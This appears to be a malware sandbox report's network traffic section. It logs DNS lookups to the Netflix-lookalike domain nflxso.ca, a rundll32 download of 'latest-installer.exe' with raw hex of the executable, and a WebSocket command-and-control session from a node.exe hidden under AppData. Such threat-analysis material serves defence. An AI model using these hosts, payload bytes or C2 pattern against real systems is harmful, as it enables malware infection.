                                                                                                                                                                                                            May 1, 2024 11:08:27.864765882 CEST138138192.168.2.4192.168.2.255
                                                                                                                                                                                                            May 1, 2024 11:08:33.931317091 CEST53557481.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.182483912 CEST5615453192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:08:54.282963991 CEST53561541.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:08:54.667205095 CEST53492041.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:11.545661926 CEST53606331.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:14.103326082 CEST5091453192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:09:14.202194929 CEST53509141.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.039659023 CEST5889953192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:09:16.039788008 CEST5115753192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:09:16.134525061 CEST53588991.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:16.134911060 CEST53511571.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:21.480331898 CEST53551481.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:27.664165020 CEST5824753192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:09:27.787480116 CEST53582471.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:42.572916031 CEST53558981.1.1.1192.168.2.4
                                                                                                                                                                                                            May 1, 2024 11:09:57.680001020 CEST5328753192.168.2.41.1.1.1
                                                                                                                                                                                                            May 1, 2024 11:09:57.805550098 CEST53532871.1.1.1192.168.2.4

                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            May 1, 2024 11:08:05.659542084 CEST192.168.2.41.1.1.10x5b32Standard query (0)files.nflxso.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:12.089757919 CEST192.168.2.41.1.1.10xaec4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:12.089952946 CEST192.168.2.41.1.1.10xb4f9Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:17.800328016 CEST192.168.2.41.1.1.10x31fdStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:17.800791979 CEST192.168.2.41.1.1.10xb119Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:54.182483912 CEST192.168.2.41.1.1.10x7b8aStandard query (0)register.nflxso.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:14.103326082 CEST192.168.2.41.1.1.10xd376Standard query (0)register.nflxso.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:16.039659023 CEST192.168.2.41.1.1.10xe0ebStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:16.039788008 CEST192.168.2.41.1.1.10xfbd9Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:27.664165020 CEST192.168.2.41.1.1.10x88f2Standard query (0)register.nflxso.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:57.680001020 CEST192.168.2.41.1.1.10xb277Standard query (0)register.nflxso.caA (IP address)IN (0x0001)false

                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            May 1, 2024 11:08:05.760641098 CEST1.1.1.1192.168.2.40x5b32No error (0)files.nflxso.ca172.67.152.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:05.760641098 CEST1.1.1.1192.168.2.40x5b32No error (0)files.nflxso.ca104.21.1.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:12.184945107 CEST1.1.1.1192.168.2.40xb4f9No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:12.184963942 CEST1.1.1.1192.168.2.40xaec4No error (0)www.google.com142.251.16.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:12.184963942 CEST1.1.1.1192.168.2.40xaec4No error (0)www.google.com142.251.16.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:12.184963942 CEST1.1.1.1192.168.2.40xaec4No error (0)www.google.com142.251.16.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:12.184963942 CEST1.1.1.1192.168.2.40xaec4No error (0)www.google.com142.251.16.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:12.184963942 CEST1.1.1.1192.168.2.40xaec4No error (0)www.google.com142.251.16.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:12.184963942 CEST1.1.1.1192.168.2.40xaec4No error (0)www.google.com142.251.16.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:17.896565914 CEST1.1.1.1192.168.2.40xb119No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:17.897937059 CEST1.1.1.1192.168.2.40x31fdNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:17.897937059 CEST1.1.1.1192.168.2.40x31fdNo error (0)plus.l.google.com172.253.122.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:17.897937059 CEST1.1.1.1192.168.2.40x31fdNo error (0)plus.l.google.com172.253.122.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:17.897937059 CEST1.1.1.1192.168.2.40x31fdNo error (0)plus.l.google.com172.253.122.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:17.897937059 CEST1.1.1.1192.168.2.40x31fdNo error (0)plus.l.google.com172.253.122.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:17.897937059 CEST1.1.1.1192.168.2.40x31fdNo error (0)plus.l.google.com172.253.122.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:17.897937059 CEST1.1.1.1192.168.2.40x31fdNo error (0)plus.l.google.com172.253.122.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:54.282963991 CEST1.1.1.1192.168.2.40x7b8aNo error (0)register.nflxso.ca74.201.73.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:08:54.282963991 CEST1.1.1.1192.168.2.40x7b8aNo error (0)register.nflxso.ca147.182.137.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:14.202194929 CEST1.1.1.1192.168.2.40xd376No error (0)register.nflxso.ca74.201.73.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:14.202194929 CEST1.1.1.1192.168.2.40xd376No error (0)register.nflxso.ca147.182.137.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:16.134525061 CEST1.1.1.1192.168.2.40xe0ebNo error (0)www.google.com172.253.62.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:16.134525061 CEST1.1.1.1192.168.2.40xe0ebNo error (0)www.google.com172.253.62.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:16.134525061 CEST1.1.1.1192.168.2.40xe0ebNo error (0)www.google.com172.253.62.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:16.134525061 CEST1.1.1.1192.168.2.40xe0ebNo error (0)www.google.com172.253.62.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:16.134525061 CEST1.1.1.1192.168.2.40xe0ebNo error (0)www.google.com172.253.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:16.134525061 CEST1.1.1.1192.168.2.40xe0ebNo error (0)www.google.com172.253.62.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:16.134911060 CEST1.1.1.1192.168.2.40xfbd9No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:27.787480116 CEST1.1.1.1192.168.2.40x88f2No error (0)register.nflxso.ca74.201.73.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:27.787480116 CEST1.1.1.1192.168.2.40x88f2No error (0)register.nflxso.ca147.182.137.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:57.805550098 CEST1.1.1.1192.168.2.40xb277No error (0)register.nflxso.ca74.201.73.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:57.805550098 CEST1.1.1.1192.168.2.40xb277No error (0)register.nflxso.ca147.182.137.203A (IP address)IN (0x0001)false

                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                            • files.nflxso.ca
                                                                                                                                                                                                            • www.google.com
                                                                                                                                                                                                            • apis.google.com
                                                                                                                                                                                                            • fs.microsoft.com
                                                                                                                                                                                                            • slscr.update.microsoft.com
                                                                                                                                                                                                            • register.nflxso.ca:6101

                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.44975774.201.73.5261018964C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            May 1, 2024 11:08:54.387012005 CEST237OUTGET /strvn HTTP/1.1
                                                                                                                                                                                                            Sec-WebSocket-Version: 13
                                                                                                                                                                                                            Sec-WebSocket-Key: R0PH52ZGGW4pHocLPSKo4A==
                                                                                                                                                                                                            Connection: Upgrade
                                                                                                                                                                                                            Upgrade: websocket
                                                                                                                                                                                                            Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                            Host: register.nflxso.ca:6101
                                                                                                                                                                                                            May 1, 2024 11:08:54.507878065 CEST183INHTTP/1.1 101 Switching Protocols
                                                                                                                                                                                                            Upgrade: websocket
                                                                                                                                                                                                            Connection: Upgrade
                                                                                                                                                                                                            Sec-WebSocket-Accept: YVu3JLflsutW2ZDAeo1ncGhfbf0=
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:53 GMT
                                                                                                                                                                                                            uWebSockets: 20


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.449758172.67.152.151808964C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            May 1, 2024 11:08:57.438606024 CEST186OUTGET /downloads/winapp/latest-version.txt HTTP/1.1
                                                                                                                                                                                                            user-agent: got (https://github.com/sindresorhus/got)
                                                                                                                                                                                                            accept-encoding: gzip, deflate, br
                                                                                                                                                                                                            Host: files.nflxso.ca
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            May 1, 2024 11:08:57.592268944 CEST829INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:57 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://files.nflxso.ca/downloads/winapp/latest-version.txt
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCwjHbzT4tXkwj9CPfghixS5o%2B3CFzpWSvdf73MFQD%2F10htxa5DDyRZ9cAPGIwH6BgTq0KHBEwug76b9LtGZtRooa16cwxuj70ZWioje3HD%2FFUL0jFapNcvR0RKwZ2oQ45k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 87cea1434d6e81e8-IAD
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                            May 1, 2024 11:08:57.592288017 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.449730172.67.152.1514437608C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-05-01 09:08:06 UTC179OUTGET /downloads/winapp/latest-installer.exe HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999
                                                                                                                                                                                                            Host: files.nflxso.ca
                                                                                                                                                                                                            2024-05-01 09:08:06 UTC692INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:06 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 7055674
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            last-modified: Wed, 23 Nov 2022 20:15:22 GMT
                                                                                                                                                                                                            etag: "637e7f5a-6ba93a"
                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTDzoGh%2FqbMYtqlZJBTtkezd8cCixkxBIcFssLMuG5bUGAL0UaeoG6TUIh1cCy9%2FlwqeTmc5CUnRrPWIa96y4%2BX4mWloVqGGsH6E4VrHlwi3ZkSGa1naV3fg6rtaF%2BGPZuA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 87cea0033cbd2076-IAD
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            2024-05-01 09:08:06 UTC677INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 79 7f 15 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 8a 06 00 00 40 00
                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELy\f@
                                                                                                                                                                                                            2024-05-01 09:08:06 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            2024-05-01 09:08:06 UTC1369INData Raw: 33 c0 5e c2 08 00 b8 ff ff ff 7f eb f5 8b 44 24 04 8b 0d 54 02 47 00 6a 00 ff 74 81 6c e8 69 ff ff ff c2 04 00 68 d8 e5 40 00 ff 74 24 08 e8 1f 40 00 00 c2 04 00 55 8b ec 81 ec d4 02 00 00 53 56 8b 75 08 57 a1 48 02 47 00 6a 07 59 8d 7d d4 f3 a5 8b 4d dc 8b 55 d4 bf 00 10 47 00 89 45 f8 8b 45 d8 33 db c1 e1 0e 03 cf 8b f0 89 4d f4 8d 4d d8 c1 e6 0e 89 0d 34 e6 41 00 8d 4a fe 03 f7 83 f9 43 89 5d fc 0f 87 3b 16 00 00 ff 24 8d d7 2a 40 00 53 50 e8 b8 3f 00 00 e9 5a 0e 00 00 ff 05 0c 82 46 00 39 5d f8 0f 84 4b 0e 00 00 53 ff 15 94 82 40 00 e9 3f 0e 00 00 50 e8 af fe ff ff 48 53 50 e8 c3 fe ff ff e9 05 16 00 00 53 50 e8 7e 3f 00 00 e9 ee 15 00 00 53 e8 42 17 00 00 83 f8 01 59 89 55 b4 7f 03 33 c0 40 50 ff 15 78 80 40 00 e9 d0 15 00 00 ff 75 f8 ff 15 64 82 40
                                                                                                                                                                                                            Data Ascii: 3^D$TGjtlih@t$@USVuWHGjY}MUGEE3MM4AJC];$*@SP?ZF9]KS@?PHSPSP~?SBYU3@Px@ud@
                                                                                                                                                                                                            2024-05-01 09:08:06 UTC1369INData Raw: 01 e8 e4 12 00 00 50 e8 9b 4a 00 00 e9 2a 0c 00 00 6a 02 e8 b0 12 00 00 6a 03 89 45 b0 89 55 b4 e8 a3 12 00 00 59 8b f8 8b 45 b0 59 6a 01 89 7d cc 89 55 d0 89 45 08 e8 ae 12 00 00 50 89 45 c4 e8 62 4a 00 00 39 5d b4 66 89 1e 75 03 89 45 08 39 5d 08 0f 84 15 11 00 00 8b 4d cc 3b cb 7d 0b 8d 3c 08 3b fb 0f 8c 03 11 00 00 3b f8 7e 02 8b f8 8b 45 c4 8d 04 78 50 56 e8 13 4a 00 00 39 5d 08 7d 0e 56 e8 1e 4a 00 00 01 45 08 79 03 89 5d 08 8b 45 08 3d 00 20 00 00 0f 8d cf 10 00 00 66 89 1c 46 e9 c6 10 00 00 6a 20 e8 3b 12 00 00 6a 31 8b f0 e8 32 12 00 00 39 5d e8 50 56 75 12 ff 15 04 81 40 00 85 c0 75 7c 8b 45 e0 e9 a8 10 00 00 ff 15 1c 81 40 00 eb ec 33 ff 47 57 e8 08 12 00 00 68 00 20 00 00 56 50 89 45 08 ff 15 24 81 40 00 85 c0 74 13 39 5d e0 74 14 56 ff 75 08
                                                                                                                                                                                                            Data Ascii: PJ*jjEUYEYj}UEPEbJ9]fuE9]M;}<;;~ExPVJ9]}VJEy]E= fFj ;j129]PVu@u|E@3GWh VPE$@t9]tVu
                                                                                                                                                                                                            2024-05-01 09:08:06 UTC1369INData Raw: 84 8b 45 e4 89 45 98 66 8b 06 66 f7 d8 1b c0 89 5d 8c 23 c6 89 45 88 66 8b 07 66 f7 d8 1b c0 c7 45 94 00 90 4c 00 23 c7 89 45 90 8d 85 7c ff ff ff 50 e8 2d 3b 00 00 85 c0 0f 84 9c 09 00 00 f6 45 80 40 0f 84 cc 0b 00 00 ff 75 b4 e8 72 49 00 00 ff 75 b4 eb 47 53 e8 35 0d 00 00 8b f0 56 6a eb e8 3a 35 00 00 56 e8 b5 3a 00 00 8b f0 3b f3 0f 84 65 09 00 00 39 5d e0 74 21 56 e8 42 49 00 00 39 5d dc 7c 0b 50 ff 75 f4 e8 f0 43 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 20 81 40 00 e9 6d 0b 00 00 6a 02 e8 e2 0c 00 00 50 e8 c6 47 00 00 8b f8 3b fb 74 13 ff 77 14 ff 75 f4 e8 b9 43 00 00 ff 77 18 e9 ef f5 ff ff 8b 45 f4 66 89 1e 66 89 18 e9 ff 08 00 00 6a ee e8 ae 0c 00 00 8d 4d b4 89 45 d0 51 50 6a 09 e8 20 48 00 00 ff d0 8b f8 8b 45 f4 66 89 1e 3b fb 66
                                                                                                                                                                                                            Data Ascii: EEff]#EffEL#E|P-;E@urIuGS5Vj:5V:;e9]t!VBI9]|PuC;tEV @mjPG;twuCwEffjMEQPj HEf;f
                                                                                                                                                                                                            2024-05-01 09:08:06 UTC1369INData Raw: 00 00 e8 c1 08 00 00 3b c3 89 45 08 0f 84 aa 06 00 00 33 c0 83 fe 01 bf d8 25 41 00 75 11 6a 23 e8 13 08 00 00 57 e8 ca 3f 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 db 07 00 00 59 a3 d8 25 41 00 56 89 55 d0 58 83 fe 03 75 0f 68 00 c0 00 00 57 53 ff 75 e4 e8 73 0d 00 00 50 57 ff 75 b4 53 ff 75 c4 ff 75 08 ff 15 28 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00 68 19 00 02 00 e8 f3 07 00 00 6a 33 8b f8 e8 aa 07 00 00 3b fb 66 89 1e 0f 84 e9 03 00 00 8d 4d b4 c7 45 b4 00 40 00 00 51 8d 4d 08 56 51 53 50 57 ff 15 2c 80 40 00 33 c9 41 85 c0 75 2e 83 7d 08 04 74 13 39 4d 08 74 06 83 7d 08 02 75 1d 8b 45 e8 89 45 fc eb 74 ff 36 33 c0 39 5d e8 56 0f 94 c0 89 45 fc e8 41 3e 00 00 eb 66 66 89 1e 89 4d fc eb 5e 68 19 00 02 00 e8 7f 07 00 00 6a 03 8b f8 e8 14
                                                                                                                                                                                                            Data Ascii: ;E3%Auj#W?DujY%AVUXuhWSusPWuSuu(@u]uhj3;fME@QMVQSPW,@3Au.}t9Mt}uEEt639]VEA>ffM^hj
                                                                                                                                                                                                            2024-05-01 09:08:06 UTC1369INData Raw: 08 e8 28 36 00 00 57 ff 15 28 81 40 00 53 53 ff 75 08 6a ff e8 5b 08 00 00 89 45 d0 ff 75 08 ff 15 20 81 40 00 39 5d d0 6a f3 5e 7d 13 6a ef 5e ff 75 c8 ff 15 40 81 40 00 c7 45 fc 01 00 00 00 56 e9 a3 f8 ff ff 53 e8 71 02 00 00 8b f8 59 3b 3d 8c 02 47 00 89 55 b4 0f 83 cb fe ff ff 8b f7 8b 45 e0 69 f6 18 40 00 00 03 35 88 02 47 00 3b c3 7c 19 8b 0c 86 75 11 83 c6 18 56 ff 75 f4 e8 02 3a 00 00 e9 da 00 00 00 51 eb 7a 83 c9 ff 2b c8 89 4d e0 74 10 6a 01 e8 20 02 00 00 59 89 55 b4 89 45 dc eb 10 ff 75 e8 8d 46 18 50 e8 f6 39 00 00 80 4e 09 01 8b 45 e0 8b 4d dc 89 0c 86 39 5d e4 0f 84 9b 00 00 00 57 e8 4d e7 ff ff e9 90 00 00 00 53 e8 e4 01 00 00 83 f8 20 59 89 55 b4 0f 83 43 fe ff ff 39 5d e4 74 25 39 5d e0 74 0f 50 e8 41 e8 ff ff 53 53 e8 90 e7 ff ff eb 64
                                                                                                                                                                                                            Data Ascii: (6W(@SSuj[Eu @9]j^}j^u@@EVSqY;=GUEi@5G;|uVu:Qz+Mtj YUEuFP9NEM9]WMS YUC9]t%9]tPASSd
                                                                                                                                                                                                            2024-05-01 09:08:06 UTC1369INData Raw: 42 00 74 08 56 e8 39 39 00 00 eb 66 ff 15 7c 80 40 00 3b 05 50 02 47 00 76 58 39 35 48 02 47 00 74 2d f6 05 14 03 47 00 01 74 47 e8 87 ff ff ff 50 8d 45 80 68 80 a0 40 00 50 ff 15 90 82 40 00 83 c4 0c 8d 45 80 50 56 e8 48 25 00 00 eb 23 56 68 f3 2d 40 00 56 6a 6f ff 35 40 02 47 00 ff 15 88 82 40 00 6a 05 50 a3 dc a6 42 00 ff 15 68 82 40 00 5e c9 c3 55 8b ec 81 ec 2c 02 00 00 53 56 33 db 57 89 5d fc 89 5d f8 ff 15 7c 80 40 00 be 00 d0 4d 00 68 00 20 00 00 05 e8 03 00 00 56 53 a3 50 02 47 00 ff 15 88 80 40 00 6a 03 68 00 00 00 80 56 e8 6b 2f 00 00 8b f8 83 ff ff 89 3d 18 a0 40 00 75 0a b8 b8 a2 40 00 e9 45 02 00 00 56 be 00 d0 4c 00 56 e8 52 34 00 00 56 e8 6d 2d 00 00 50 68 00 10 4e 00 e8 41 34 00 00 53 57 ff 15 84 80 40 00 3b c3 a3 e0 a6 42 00 8b f0 0f 8e
                                                                                                                                                                                                            Data Ascii: BtV99f|@;PGvX95HGt-GtGPEh@P@EPVH%#Vh-@Vjo5@G@jPBh@^U,SV3W]]|@Mh VSPG@jhVk/=@u@EVLVR4Vm-PhNA4SW@;B
                                                                                                                                                                                                            2024-05-01 09:08:06 UTC1369INData Raw: ff ff ff 53 53 50 ff 35 1c a0 40 00 ff 15 44 81 40 00 eb 0e 83 c8 ff eb 13 6a fe eb 02 6a fd 58 eb 0a 6a 01 e8 51 fa ff ff 59 33 c0 5f 5e 5d 5b c2 04 00 ff 74 24 08 ff 74 24 08 ff 35 18 a0 40 00 e8 07 2b 00 00 c2 08 00 6a 00 6a 00 ff 74 24 0c ff 35 18 a0 40 00 ff 15 44 81 40 00 c2 04 00 56 be 00 50 4d 00 56 e8 fc 31 00 00 56 e8 ae 28 00 00 85 c0 75 02 5e c3 56 e8 2b 28 00 00 56 e8 04 25 00 00 56 68 00 10 4d 00 e8 6a 2a 00 00 5e c3 81 ec d4 02 00 00 53 56 57 6a 20 5f 33 db 68 01 80 00 00 89 5c 24 14 c7 44 24 10 30 a2 40 00 89 5c 24 1c ff 15 ac 80 40 00 ff 15 a8 80 40 00 25 ff ff ff bf 66 3d 06 00 a3 4c 02 47 00 74 11 53 e8 d8 32 00 00 3b c3 74 07 68 00 0c 00 00 ff d0 be b0 82 40 00 56 e8 52 32 00 00 56 ff 15 50 81 40 00 8d 74 06 01 80 3e 00 75 ea 6a 0a e8
                                                                                                                                                                                                            Data Ascii: SSP5@D@jjXjQY3_^][t$t$5@+jjt$5@D@VPMV1V(u^V+(V%VhMj*^SVWj _3h\$D$0@\$@@%f=LGtS2;th@VR2VP@t>uj
